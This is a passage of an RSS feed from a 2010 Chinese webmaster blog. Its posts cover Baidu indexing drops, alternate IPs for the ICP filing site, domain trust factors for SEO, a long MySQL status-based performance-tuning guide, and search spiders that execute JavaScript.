src="/uploadfiles/2010-3/2010331032839.jpg" /><img alt="" width="226" height="107" src="/uploadfiles/2010-3/2010331237683.jpg" /><img alt="" width="181" height="121" src="/uploadfiles/2010-3/2010331684547.jpg" /></p>
<p>2010年3月31日，百度疑似出现大规模故障，所有网站百度收录减少，其中，搜狐由5000万收录减少至1000万。笔者的大部分网站也都出现收录暴降的情况。但是，早上时段从百度来的流量没有出现明显的降低。</p>
<p>对于本次百度收录减少事故，有以下几种猜测：</p>
<p>1、百度出现大规模的故障。这也是较多人的看法</p>
<p>2、百度将进行大规模的算法变更，此次收录减少事故只是算法变更的意外效果。在此前，百度史无前例地将在3月19日，3月26日连续两周进行了大更新，大量网站出现排名降低&mdash;恢复的折腾情况。</p>
<p>3、百度之前的收录为为了应对谷歌竞争而进行的虚假收录，收录数据可信程度类似统计局，现在谷歌走了，百度也就懒得造假了，现在的收录才是真实收录。</p>
<p>ps：昨天因为被某关键词殃及的谷歌今天终于恢复访问了，这算是今天最好的消息了。</p>
<p>ps2：目前站长情绪稳定。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-03-31 09:11:45]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[备案网站打不开的解决办法]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/beianwangzhandabukai5585.html]]></link><description><![CDATA[<p>&quot;备案网站怎么打不开&quot;，还在为备案网站打不开而烦恼么？还在抓狂滴等待miibeian.gov.cn打开？还在为备案中心网站打开以后验证码却刷新不出来而烦恼吗？今天读完本文以后，你将不再为&ldquo;备案网站老是打不开&rdquo;这一问题而烦恼啦，赶快拿起你手上的键盘拨打我们的抢购电话40083838248&hellip;&hellip;</p>
<p>工信部备案网站打不开的原因主要是工信部备案网站的造价太低，据说只花了几百万，以至于无法承受太多的流量，才会出现经常打不开的情况，服务器受不了，而大家平时都使用miibeian.gov.cn这个域名访问备案网站，这个域名都是指向同一台服务器的，导致单台服务器承受能力有限出现问题，事实上，工信部还是有考虑负载问题的，在你访问miibeian.gov.cn寻死觅活无法打开的时候，你可以通过ip访问其他服务器：</p>
<blockquote>
<p><a href="http://211.94.161.70">http://211.94.161.70</a></p>
<p><a href="http://219.143.225.7/">http://219.143.225.7</a> <br />
<br />
&nbsp;</p>
</blockquote>
<p>备案网站除了经常打不开这个问题以外，还存在很多令人上火的地方，例如个人无法自行添加网站，例如同一窗口无法登陆多个用户&hellip;&hellip;总归一个原因就是备案网站造价太低了，因此飞翔猪在这里强烈呼吁工信部的领导开展备案网站二期改建工程，这次的投资一定要上千万才行，不要再搞这种几百万的小网站出来了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-03-03 16:22:45]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[域名信任度(TrustRank) 应该是存在]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/trustrank5018.html]]></link><description><![CDATA[<p>域名信任度(TrustRank)应该是存在的，这是综合4个网站在Google中的表现得出的结论。拥有高域名信任度的网站，在Google的表现十分出色。</p>
<p>那么如何拥有高域名信任度(TrustRank)呢？有以下几点可供参考</p>
<p>1、保持内容的独特，至少一开始保持。如果一开始就采集，很难获得搜索引擎的信任，这里也未必要求一开始就要原创，独特的内容未必都是原创的原创。</p>
<p>2、保持网站访问速度的稳定，Google的管理员工具可以很好地做到这一点，抓取工具分析可以让你很容易掌握网站访问速度的变化。及时作出反应</p>
<p>3、控制并监视网站访问错误的数量，包括404，500错误。同样可以利用Google管理员工具。</p>
<p>4、看似正规的联系方式以及关于我们等介绍，包括whois信息与网站联系方式的匹配。</p>
<p>5、域名年龄。</p>
<p>6、清白的建站历史&mdash;&mdash;不作弊的历史。至少没有明显作弊。</p>
<p>7、远离恶邻，别跟私服搬家公司这类的网站扯上关系。</p>
<p>回头看下这些提示，其实，只要你维护好网站（保证速度，减少错误），真正把用心培育网站（域名年龄，清白历史，远离恶邻），会很自然地得到一个满意的域名信任度(TrustRank)。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-02-25 23:06:44]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[相关度计算工具上线]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/ruhejisuanxiangguandu2902.html]]></link><description><![CDATA[<p>在搜索引擎对某个词语的索引进行排序的过程中，语料和该词语的相关度对排名起了很大的影响。例如，你的目标词语是&ldquo;郑州挖掘机&rdquo;，在meta，关键词分布，链接等方面都很完美的情况，里面的绝大部分内容却是&ldquo;移民投资&rdquo;，&ldquo;郑州挖掘机&rdquo;只是牵强地分布在文章中，那这样的网页，除非关键词竞争度很低，否则很难获得排名，其中关键的原因就在于网页主题和目标词语的相关度太低。</p>
<p>在外部链接的建设中也同样需要考虑到相关度，一个非主流的网站给予一个股票站链接，所起的作用微乎其微。</p>
<p>基于这些方面的应用，根据互信息信息原理，我开发了相关度计算工具，地址为 <a href="http://relative.001pp.com/">http://relative.001pp.com/</a> 有兴趣的朋友可以去了解下。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-29 11:23:06]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[mysql 性能优化方案]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/mysql xingnengyouhua2183.html]]></link><description><![CDATA[<p>网上有不少mysql 性能优化方案，不过，mysql的优化同sql server相比，更为麻烦与负责，同样的设置，在不同的环境下 ，由于内存，访问量，读写频率，数据差异等等情况，可能会出现不同的结果，因此简单地根据某个给出方案来配置mysql是行不通的，最好能使用status信息对mysql进行具体的优化，网上找了一篇文章，分页分得乱七八糟的，只能转到博客。</p>
<blockquote>
<p><code><font face="NSimsun">mysql&gt; show global status; </font></code></p>
</blockquote>
<p>　　可以列出MySQL服务器运行各种状态值，另外，查询MySQL服务器配置信息语句：</p>
<blockquote>
<p><code><font face="NSimsun">mysql&gt; show variables; </font></code></p>
</blockquote>
<p>一、慢查询</p>
<blockquote>
<p><code><font face="NSimsun">mysql&gt; show variables like ‘%slow%‘;<br />
+------------------+-------+<br />
| Variable_name　　　　 | Value |<br />
+------------------+-------+<br />
| log_slow_queries | ON　　　　 |<br />
| slow_launch_time | 2　　　　　 |<br />
+------------------+-------+</font><br />
<br />
<font face="NSimsun">mysql&gt; show global status like ‘%slow%‘;<br />
+---------------------+-------+<br />
| Variable_name　　　　　　　 | Value |<br />
+---------------------+-------+<br />
| Slow_launch_threads | 0　　　　　 |<br />
| Slow_queries　　　　　　　　 | 4148 |<br />
+---------------------+-------+ <br />
</font></code></p>
</blockquote>
<p>配置中打开了记录慢查询，执行时间超过2秒的即为慢查询，系统显示有4148个慢查询，你可以分析慢查询日志，找出有问题的SQL语句，慢查询时间不宜设置过长，否则意义不大，最好在5秒以内，如果你需要微秒级别的慢查询，可以考虑给MySQL打补丁：http://www.percona.com/docs/wiki/release:start，记得找对应的版本。</p>
<p>打开慢查询日志可能会对系统性能有一点点影响，如果你的MySQL是主－从结构，可以考虑打开其中一台从服务器的慢查询日志，这样既可以监控慢查询，对系统性能影响又小。</p>
<p>二、连接数</p>
<p>经常会遇见&rdquo;MySQL: ERROR 1040: Too many connections&rdquo;的情况，一种是访问量确实很高，MySQL服务器抗不住，这个时候就要考虑增加从服务器分散读压力，另外一种情况是MySQL配置文件中max_connections值过小：</p>
<blockquote>
<p>mysql&gt; show variables like ‘max_connections‘;<br />
+-----------------+-------+<br />
| Variable_name　　　 | Value |<br />
+-----------------+-------+<br />
| max_connections | 256　　 |<br />
+-----------------+-------+</p>
</blockquote>
<p>这台MySQL服务器最大连接数是256，然后查询一下服务器响应的最大连接数：</p>
<blockquote>
<p>mysql&gt; show global status like ‘Max_used_connections‘;</p>
</blockquote>
<p>MySQL服务器过去的最大连接数是245，没有达到服务器连接数上限256，应该没有出现1040错误，比较理想的设置是</p>
<blockquote>
<p>Max_used_connections / max_connections * 100% &asymp; 85%</p>
</blockquote>
<p>最大连接数占上限连接数的85％左右，如果发现比例在10%以下，MySQL服务器连接数上限设置的过高了。</p>
<p>三、Key_buffer_size</p>
<p>key_buffer_size是对MyISAM表性能影响最大的一个参数，下面一台以MyISAM为主要存储引擎服务器的配置：</p>
<blockquote>
<p>mysql&gt; show variables like ‘key_buffer_size‘;+-----------------+------------+<br />
| Variable_name　　　 | Value　　　　　　 |<br />
+-----------------+------------+<br />
| key_buffer_size | 536870912 |<br />
+-----------------+------------+</p>
</blockquote>
<p>分配了512MB内存给key_buffer_size，我们再看一下key_buffer_size的使用情况：</p>
<blockquote>
<p>mysql&gt; show global status like ‘key_read%‘;<br />
+------------------------+-------------+<br />
| Variable_name　　　　　　　　　　 | Value　　　　　　　 |<br />
+------------------------+-------------+<br />
| Key_read_requests　　　　　　 | 27813678764 |<br />
| Key_reads　　　　　　　　　　　　　　 | 6798830　　　　　 |<br />
+------------------------+-------------+</p>
</blockquote>
<p>　　一共有27813678764个索引读取请求，有6798830个请求在内存中没有找到直接从硬盘读取索引，计算索引未命中缓存的概率：</p>
<p>key_cache_miss_rate ＝ Key_reads / Key_read_requests * 100%</p>
<p>比如上面的数据，key_cache_miss_rate为0.0244%，4000个索引读取请求才有一个直接读硬盘，已经很BT了，key_cache_miss_rate在0.1%以下都很好（每1000个请求有一个直接读硬盘），如果key_cache_miss_rate在0.01%以下的话，key_buffer_size分配的过多，可以适当减少。</p>
<p>MySQL服务器还提供了key_blocks_*参数：</p>
<blockquote>
<p>mysql&gt; show global status like ‘key_blocks_u%‘;<br />
+------------------------+-------------+<br />
| Variable_name　　　　　　　　　　 | Value　　　　　　　 |<br />
+------------------------+-------------+<br />
| Key_blocks_unused　　　　　　 | 0　　　　　　　　　　　 |<br />
| Key_blocks_used　　　　　　　　 | 413543　　　　　　 |<br />
+------------------------+-------------+</p>
</blockquote>
<p>Key_blocks_unused表示未使用的缓存簇(blocks)数，Key_blocks_used表示曾经用到的最大的blocks数，比如这台服务器，所有的缓存都用到了，要么增加key_buffer_size，要么就是过渡索引了，把缓存占满了。比较理想的设置：</p>
<p>Key_blocks_used / (Key_blocks_unused + Key_blocks_used) * 100% &asymp; 80%</p>
<p>四、临时表</p>
<blockquote>
<p>mysql&gt; show global status like ‘created_tmp%‘;<br />
+-------------------------+---------+<br />
| Variable_name　　　　　　　　　　　 | Value　　　 |<br />
+-------------------------+---------+<br />
| Created_tmp_disk_tables | 21197　　　 |<br />
| Created_tmp_files　　　　　　　 | 58　　　　　　 |<br />
| Created_tmp_tables　　　　　　 | 1771587 |<br />
+-------------------------+---------+</p>
</blockquote>
<p>每次创建临时表，Created_tmp_tables增加，如果是在磁盘上创建临时表，Created_tmp_disk_tables也增加,Created_tmp_files表示MySQL服务创建的临时文件文件数，比较理想的配置是：</p>
<p>　　Created_tmp_disk_tables / Created_tmp_tables * 100% &lt;= 25%比如上面的服务器Created_tmp_disk_tables / Created_tmp_tables * 100% ＝ 1.20%，应该相当好了。我们再看一下MySQL服务器对临时表的配置：</p>
<blockquote>
<p>mysql&gt; show variables where Variable_name in (‘tmp_table_size‘, ‘max_heap_table_size‘);<br />
+---------------------+-----------+<br />
| Variable_name　　　　　　　 | Value　　　　　 |<br />
+---------------------+-----------+<br />
| max_heap_table_size | 268435456 |<br />
| tmp_table_size　　　　　　 | 536870912 |<br />
+---------------------+-----------+</p>
</blockquote>
<p>只有256MB以下的临时表才能全部放内存，超过的就会用到硬盘临时表。</p>
<p>五、Open Table情况</p>
<blockquote>
<p>mysql&gt; show global status like ‘open%tables%‘;<br />
+---------------+-------+<br />
| Variable_name | Value |<br />
+---------------+-------+<br />
| Open_tables　　　 | 919　　　 |<br />
| Opened_tables | 1951　 |<br />
+---------------+-------+</p>
</blockquote>
<p>Open_tables表示打开表的数量，Opened_tables表示打开过的表数量，如果Opened_tables数量过大，说明配置中table_cache(5.1.3之后这个值叫做table_open_cache)值可能太小，我们查询一下服务器table_cache值：</p>
<blockquote>
<p>mysql&gt; show variables like ‘table_cache‘;<br />
+---------------+-------+<br />
| Variable_name | Value |<br />
+---------------+-------+<br />
| table_cache　　　 | 2048　 |<br />
+---------------+-------+</p>
</blockquote>
<p>比较合适的值为：</p>
<blockquote>
<p>Open_tables / Opened_tables * 100% &gt;= 85%</p>
<p>Open_tables / table_cache * 100% &lt;= 95%</p>
</blockquote>
<p>六、进程使用情况</p>
<blockquote>
<p>mysql&gt; show global status like ‘Thread%‘;<br />
+-------------------+-------+<br />
| Variable_name　　　　　 | Value |<br />
+-------------------+-------+<br />
| Threads_cached　　　　 | 46　　　　 |<br />
| Threads_connected | 2　　　　　 |<br />
| Threads_created　　　 | 570　　　 |<br />
| Threads_running　　　 | 1　　　　　 |<br />
+-------------------+-------+</p>
</blockquote>
<p>如果我们在MySQL服务器配置文件中设置了thread_cache_size，当客户端断开之后，服务器处理此客户的线程将会缓存起来以响应下一个客户而不是销毁（前提是缓存数未达上限）。Threads_created表示创建过的线程数，如果发现Threads_created值过大的话，表明MySQL服务器一直在创建线程，这也是比较耗资源，可以适当增加配置文件中thread_cache_size值，查询服务器thread_cache_size配置：</p>
<blockquote>
<p>mysql&gt; show variables like ‘thread_cache_size‘;<br />
+-------------------+-------+<br />
| Variable_name　　　　　 | Value |<br />
+-------------------+-------+<br />
| thread_cache_size | 64　　　　 |<br />
+-------------------+-------+</p>
</blockquote>
<p>示例中的服务器还是挺健康的。</p>
<p>七、查询缓存(query cache)</p>
<blockquote>
<p>mysql&gt; show global status like ‘qcache%‘;<br />
+-------------------------+-----------+<br />
| Variable_name　　　　　　　　　　　 | Value　　　　　 |<br />
+-------------------------+-----------+<br />
| Qcache_free_blocks　　　　　　 | 22756　　　　　 |<br />
| Qcache_free_memory　　　　　　 | 76764704　 |<br />
| Qcache_hits　　　　　　　　　　　　　 | 213028692 |<br />
| Qcache_inserts　　　　　　　　　　 | 208894227 |<br />
| Qcache_lowmem_prunes　　　　 | 4010916　　　 |<br />
| Qcache_not_cached　　　　　　　 | 13385031　 |<br />
| Qcache_queries_in_cache | 43560　　　　　 |<br />
| Qcache_total_blocks　　　　　 | 111212　　　　 |<br />
+-------------------------+-----------+</p>
</blockquote>
<p>MySQL查询缓存变量解释：</p>
<p>Qcache_free_blocks：缓存中相邻内存块的个数。数目大说明可能有碎片。FLUSH QUERY CACHE会对缓存中的碎片进行整理，从而得到一个空闲块。</p>
<p>Qcache_free_memory：缓存中的空闲内存。</p>
<p>Qcache_hits：每次查询在缓存中命中时就增大</p>
<p>Qcache_inserts：每次插入一个查询时就增大。命中次数除以插入次数就是不中比率。</p>
<p>Qcache_lowmem_prunes：缓存出现内存不足并且必须要进行清理以便为更多查询提供空间的次数。这个数字最好长时间来看；如果这个数字在不断增长，就表示可能碎片非常严重，或者内存很少。（上面的 free_blocks和free_memory可以告诉您属于哪种情况）</p>
<p>Qcache_not_cached：不适合进行缓存的查询的数量，通常是由于这些查询不是 SELECT 语句或者用了now()之类的函数。</p>
<p>Qcache_queries_in_cache：当前缓存的查询（和响应）的数量。</p>
<p>Qcache_total_blocks：缓存中块的数量。</p>
<p>我们再查询一下服务器关于query_cache的配置：</p>
<blockquote>
<p>mysql&gt; show variables like ‘query_cache%‘;<br />
+------------------------------+-----------+<br />
| Variable_name　　　　　　　　　　　　　　　　 | Value　　　　　 |<br />
+------------------------------+-----------+<br />
| query_cache_limit　　　　　　　　　　　　 | 2097152　　　 |<br />
| query_cache_min_res_unit　　　　　 | 4096　　　　　　 |<br />
| query_cache_size　　　　　　　　　　　　　 | 203423744 |<br />
| query_cache_type　　　　　　　　　　　　　 | ON　　　　　　　　 |<br />
| query_cache_wlock_invalidate | OFF　　　　　　　 |<br />
+------------------------------+-----------+</p>
</blockquote>
<p>各字段的解释：</p>
<p>query_cache_limit：超过此大小的查询将不缓存</p>
<p>query_cache_min_res_unit：缓存块的最小大小</p>
<p>query_cache_size：查询缓存大小</p>
<p>query_cache_type：缓存类型，决定缓存什么样的查询，示例中表示不缓存 select sql_no_cache 查询</p>
<p>query_cache_wlock_invalidate：当有其他客户端正在对MyISAM表进行写操作时，如果查询在query cache中，是否返回cache结果还是等写操作完成再读表获取结果。</p>
<p>query_cache_min_res_unit的配置是一柄&rdquo;双刃剑&rdquo;，默认是4KB，设置值大对大数据查询有好处，但如果你的查询都是小数据查询，就容易造成内存碎片和浪费。</p>
<p>查询缓存碎片率 = Qcache_free_blocks / Qcache_total_blocks * 100%</p>
<p>如果查询缓存碎片率超过20%，可以用FLUSH QUERY CACHE整理缓存碎片，或者试试减小query_cache_min_res_unit，如果你的查询都是小数据量的话。</p>
<p>查询缓存利用率 = (query_cache_size - Qcache_free_memory) / query_cache_size * 100%</p>
<p>查询缓存利用率在25%以下的话说明query_cache_size设置的过大，可适当减小；查询缓存利用率在80％以上而且Qcache_lowmem_prunes &gt; 50的话说明query_cache_size可能有点小，要不就是碎片太多。</p>
<p>查询缓存命中率 = (Qcache_hits - Qcache_inserts) / Qcache_hits * 100%</p>
<p>示例服务器 查询缓存碎片率 ＝ 20.46％，查询缓存利用率 ＝ 62.26％，查询缓存命中率 ＝ 1.94％，命中率很差，可能写操作比较频繁吧，而且可能有些碎片。</p>
<p>八、排序使用情况</p>
<blockquote>
<p>mysql&gt; show global status like ‘sort%‘;<br />
+-------------------+------------+<br />
| Variable_name　　　　　 | Value　　　　　　 |<br />
+-------------------+------------+<br />
| Sort_merge_passes | 29　　　　　　　　　 |<br />
| Sort_range　　　　　　　　 | 37432840　　　 |<br />
| Sort_rows　　　　　　　　　 | 9178691532 |<br />
| Sort_scan　　　　　　　　　 | 1860569　　　　 |<br />
+-------------------+------------+</p>
</blockquote>
<p>Sort_merge_passes 包括两步。MySQL 首先会尝试在内存中做排序，使用的内存大小由系统变量 Sort_buffer_size 决定，如果它的大小不够把所有的记录都读到内存中，MySQL 就会把每次在内存中排序的结果存到临时文件中，等 MySQL 找到所有记录之后，再把临时文件中的记录做一次排序。这再次排序就会增加 Sort_merge_passes。实际上，MySQL 会用另一个临时文件来存再次排序的结果，所以通常会看到 Sort_merge_passes 增加的数值是建临时文件数的两倍。因为用到了临时文件，所以速度可能会比较慢，增加 Sort_buffer_size 会减少 Sort_merge_passes 和 创建临时文件的次数。但盲目的增加 Sort_buffer_size 并不一定能提高速度，见 How fast can you sort data with MySQL?（引自<a href="http://qroom.blogspot.com/2007/09/mysql-select-sort.html">http://qroom.blogspot.com/2007/09/mysql-select-sort.html</a>，貌似被墙）</p>
<p>另外，增加read_rnd_buffer_size(3.2.3是record_rnd_buffer_size)的值对排序的操作也有一点的好处，参见：<a href="http://www.mysqlperformanceblog.com/2007/07/24/what-exactly-is-read_rnd_buffer_size/">http://www.mysqlperformanceblog.com/2007/07/24/what-exactly-is-read_rnd_buffer_size/</a></p>
<p>九、文件打开数(open_files)</p>
<blockquote>
<p>mysql&gt; show global status like ‘open_files‘;<br />
+---------------+-------+<br />
| Variable_name | Value |<br />
+---------------+-------+<br />
| Open_files　　　　 | 1410　 |<br />
+---------------+-------+</p>
</blockquote><blockquote>
<p>mysql&gt; show variables like ‘open_files_limit‘;<br />
+------------------+-------+<br />
| Variable_name　　　　 | Value |<br />
+------------------+-------+<br />
| open_files_limit | 4590　 |<br />
+------------------+-------+</p>
</blockquote>
<p>比较合适的设置：Open_files / open_files_limit * 100% &lt;= 75％</p>
<p>十、表锁情况</p>
<blockquote>
<p>mysql&gt; show global status like ‘table_locks%‘;<br />
+-----------------------+-----------+<br />
| Variable_name　　　　　　　　　 | Value　　　　　 |<br />
+-----------------------+-----------+<br />
| Table_locks_immediate | 490206328 |<br />
| Table_locks_waited　　　　 | 2084912　　　 |<br />
+-----------------------+-----------+</p>
</blockquote>
<p>　　Table_locks_immediate表示立即释放表锁数，Table_locks_waited表示需要等待的表锁数，如果Table_locks_immediate / Table_locks_waited &gt; 5000，最好采用InnoDB引擎，因为InnoDB是行锁而MyISAM是表锁，对于高并发写入的应用InnoDB效果会好些。示例中的服务器Table_locks_immediate / Table_locks_waited ＝ 235，MyISAM就足够了。</p>
<p>十一、表扫描情况</p>
<blockquote>
<p>mysql&gt; show global status like ‘handler_read%‘;<br />
+-----------------------+-------------+<br />
| Variable_name　　　　　　　　　 | Value　　　　　　　 |<br />
+-----------------------+-------------+<br />
| Handler_read_first　　　　 | 5803750　　　　　 |<br />
| Handler_read_key　　　　　　 | 6049319850　 |<br />
| Handler_read_next　　　　　 | 94440908210 |<br />
| Handler_read_prev　　　　　 | 34822001724 |<br />
| Handler_read_rnd　　　　　　 | 405482605　　　 |<br />
| Handler_read_rnd_next | 18912877839 |<br />
+-----------------------+-------------+</p>
</blockquote>
<p>各字段解释参见<a href="http://hi.baidu.com/thinkinginlamp/blog/item/31690cd7c4bc5cdaa144df9c.html">http://hi.baidu.com/thinkinginlamp/blog/item/31690cd7c4bc5cdaa144df9c.html</a>，调出服务器完成的查询请求次数：</p>
<blockquote>
<p>mysql&gt; show global status like ‘com_select‘;<br />
+---------------+-----------+<br />
| Variable_name | Value　　　　　 |<br />
+---------------+-----------+<br />
| Com_select　　　　 | 222693559 |<br />
+---------------+-----------+</p>
</blockquote>
<p>计算表扫描率：</p>
<p>表扫描率 ＝ Handler_read_rnd_next / Com_select</p>
<p>如果表扫描率超过4000，说明进行了太多表扫描，很有可能索引没有建好，增加read_buffer_size值会有一些好处，但最好不要超过8MB。</p>
<p>后记：</p>
<p>文中提到一些数字都是参考值，了解基本原理就可以，除了MySQL提供的各种status值外，操作系统的一些性能指标也很重要，比如常用的top,iostat等，尤其是iostat，现在的系统瓶颈一般都在磁盘IO上，关于iostat的使用，可以参考：<a href="http://www.php-oa.com/2009/02/03/iostat.html">http://www.php-oa.com/2009/02/03/iostat.html</a></p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-23 09:04:56]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[牺牲实时性降低资源消耗]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/shishixing1874.html]]></link><description><![CDATA[<p>昨天在使用<a target="_blank" href="http://adm.baidu.com">百度广告管家</a>的时候，对某些时候通过&ldquo;牺牲实时性来降低资源消耗&rdquo;这一技巧有了更深刻的了解。百度广告管家提供了对广告位的管理，广告的投放，以及点击的统计功能，其广告点击统计功能秉承了百度系产品低实时性的传统&hellip;&hellip;广告点击没有马上显示。而是在第二天才显示。百度的联盟也是如此，在大多数的广告联盟数据实时性都已经在提升的情况下，百度的广告联盟仍然是第二天中午3点以后才返回数据的。这种做法其实源自搜索引擎索引的更新。对于搜索引擎的索引，每隔一段时间更新一次，一段时间索引只进行一次排序。而对于这些统计数据而言，一段时间内，也只生成一份报告，大大地降低了系统资源的消耗。</p>
<p>这样的技巧值得我们借鉴，淘宝的架构师也提到，适时牺牲数据一致性来提高程序效率，很多时候，实时性，一致性，这类的需求并非必须的，适当地做一些牺牲能让性能得到极大的提升。</p>
<p>说句题外话，可能就是对这种牺牲用得太熟练的，导致百度对实时数据的抓取兴致缺缺。对网页的索引速度也远远比不上Google，有点小家子气了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-20 09:03:33]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[点石无法访问——史有前例]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/dianshi1827.html]]></link><description><![CDATA[<p>点石无法访问了。。。大家在论坛讨论Google事件的时候，我就隐约由此预感</p>
<p>问题应该是出在论坛，这次重开估计很难了。没有博客的前置审批，没有论坛的专项备案，这个时候又犯忌。。。seowhy已经早早地参考dizcus启用了仅会员浏览的模式。dunsh在这方面太粗心了。</p>
<p>其他的站长，假如手上的论坛还在国内，还没被关闭的，早点设置好论坛，游客无法访问，半夜无法发帖，只谈风月不谈国事吧。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2010-01-19 19:59:40]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[为什么我的访问统计里有来自美国google的访问者]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/fangwentongji1825.html]]></link><description><![CDATA[<p>站长有时候查看访问统计的时候，会发现经常有来自美国的ip访问，一追踪来源，有时候是google总部，有的是来自西雅图微软，这些莫名其妙的访问给站长添加了不少麻烦，有朋友怀疑，是不是Google觉得自己作弊了，特地派人访问网站？是不是微软准备收购自己的网站&hellip;&hellip;</p>
<p>事实上，这些访问并非来自人类，其访问来自Google或者微软的搜索引擎内容抓取系统，你可以把他们理解为一种蜘蛛（spider）。而可能这样的解释还不让人满意，为什么这些蜘蛛，可以在访问统计里被查看到，不是说一般情况下，蜘蛛是无法被访问统计统计到的么？</p>
<p>访问统计的工作原理，通常是使用一段脚本，进行调用，只有执行了脚本，访问统计程序才会正常工作。而一般的蜘蛛，它只负责抓取页面，抓取的过程并没有，或者说根本无法执行脚本，这样访问统计就记录不到蜘蛛的访问。而市场上一些监控蜘蛛抓取的程序，要么是分析web日志，要么在蜘蛛访问动态页面的时候进行记录，对于静态页面无能为力。</p>
<p>而这种能被访问统计监测到的蜘蛛&mdash;&mdash;姑且称为模拟蜘蛛&mdash;&mdash;它和它的前辈们不同的是，它能够像浏览器一样，拥有解释，执行js脚本的能力。这种蜘蛛的出现，是为了加强搜索引擎索引的深度&mdash;&mdash;你用js执行后所显示的内容，也能让搜素引擎抓取到，并且，有一部分利用早期搜索引擎无法抓取js的弱点，而是用js进行作弊，包括网页隐藏文字等手段，也能够通过这种方法识别出来。</p>
